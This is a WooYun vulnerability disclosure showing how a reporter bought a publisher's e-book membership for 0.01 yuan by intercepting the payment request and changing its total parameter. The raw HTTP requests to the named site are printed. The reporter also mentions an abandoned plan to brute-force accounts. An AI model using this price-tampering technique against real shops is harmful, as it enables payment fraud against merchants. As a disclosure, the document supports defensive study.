当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160802

漏洞标题:华章图文某站漏洞可一分钱支付图书费用

相关厂商:北京华章图文信息有限公司

漏洞作者: 路人甲

提交时间:2015-12-14 11:03

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

其实上面的链接除了广告,还有就是混淆视听。
罪魁祸首是:
http://weixin.hztraining.com/
纸质书到货以后,小伙伴们都想看,于是就想整个电子版的。
然后就看到书后面有这个网站:
数字阅读:www.hzmedia.com.cn
指向 weixin.hztraining.com
在线阅读
http://weixin.hztraining.com/w/reader.aspx?id=983fa362-6a0c-4aa8-9788-8f7281ebf007_1
但是这个在线阅读只显示前三章。
既然是数字阅读,那肯定是提供电子版的。

1111.png


本来是想爆破个账号的,结果网站有360主机卫士。
然后就去看一下支付环节

2222.png


burp分析了一下,
提交订单

POST /book.ashx HTTP/1.1
Host: weixin.hztraining.com
Content-Length: 11
Accept: */*
Origin: http://weixin.hztraining.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://weixin.hztraining.com/order.html?id=1009
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
m=25&d=1009


GET /abc/alipayto.aspx?out=10718&total=800.00&subject=%E5%8D%8E%E7%AB%A0%E6%95%B0%E5%AA%92%E4%BC%9A%E5%91%98%E7%95%85%E8%AF%BB%E5%8D%A1 HTTP/1.1
Host: weixin.hztraining.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://weixin.hztraining.com/order.html?id=1009
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8


把800.00修改成0.01继续

33333.png


然后就把代理去掉,跳到了支付宝的支付页面了。

4444.png


然后就支付成功了。。。

漏洞证明:

555.png


666666.png


修复方案:

传输要做校验

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝